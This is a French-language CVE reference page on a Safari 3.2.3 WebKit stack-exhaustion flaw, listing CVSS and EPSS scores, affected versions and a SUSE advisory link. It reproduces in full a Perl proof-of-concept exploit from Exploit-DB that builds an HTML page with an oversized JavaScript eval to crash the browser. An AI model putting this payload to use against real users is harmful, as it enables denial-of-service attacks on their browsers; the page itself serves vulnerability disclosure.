Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Stack consumption vulnerability in WebKit.dll in WebKit in Apple Safari 3.2.3, and possibly other versions before 4.1.2, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls eval on a long string composed of A/ sequences.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 9606
Date de publication : 2009-09-08 22h00 +00:00
Auteur : Jeremy Brown
EDB Vérifié : Yes
#!/usr/bin/perl
# letsgosurfinnowonsafari.pl
# AKA
# Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009
#
# *********************************************************************************************************
# Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating
# 21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow"
# exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times
# (43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the
# WebKit layout engine (www.webkit.org).
# This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4
# (4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for
# quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty
# much means that the stack for the process has been exhausted and its maximum size has been reached.
# *********************************************************************************************************
# letsgosurfinnowonsafari.pl
$fn = 'letsgosurfinnowwithsafari.html';
$size = 21526; # "Stack Overflow" WebKit.dll
#$size = 21697; # "Access Violation" WebKit.dll
$payload = '<html><script type="text/javascript">' . "\n";
$payload = $payload . 'eval("' . "A/" x $size . '");' . "\n";
$payload = $payload . '</script></html>';
open(FD, '>' . $fn);
print FD $payload;
close(FD);
# milw0rm.com [2009-09-09]
Products Mentioned
Configuraton 0
Apple>>Safari >> Version 3.2.3
Apple>>Safari >> Version 4.0
- Apple>>Safari >> Version 4.0 (Open CPE detail)
- Apple>>Safari >> Version 4.0 (Open CPE detail)
Apple>>Safari >> Version 4.0
- Apple>>Safari >> Version 4.0 (Open CPE detail)
Apple>>Safari >> Version 4.0.0b
- Apple>>Safari >> Version 4.0.0b (Open CPE detail)
Apple>>Safari >> Version 4.0.2
- Apple>>Safari >> Version 4.0.2 (Open CPE detail)
Apple>>Safari >> Version 4.0.3
- Apple>>Safari >> Version 4.0.3 (Open CPE detail)
Références
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
2025©
tesweb SA
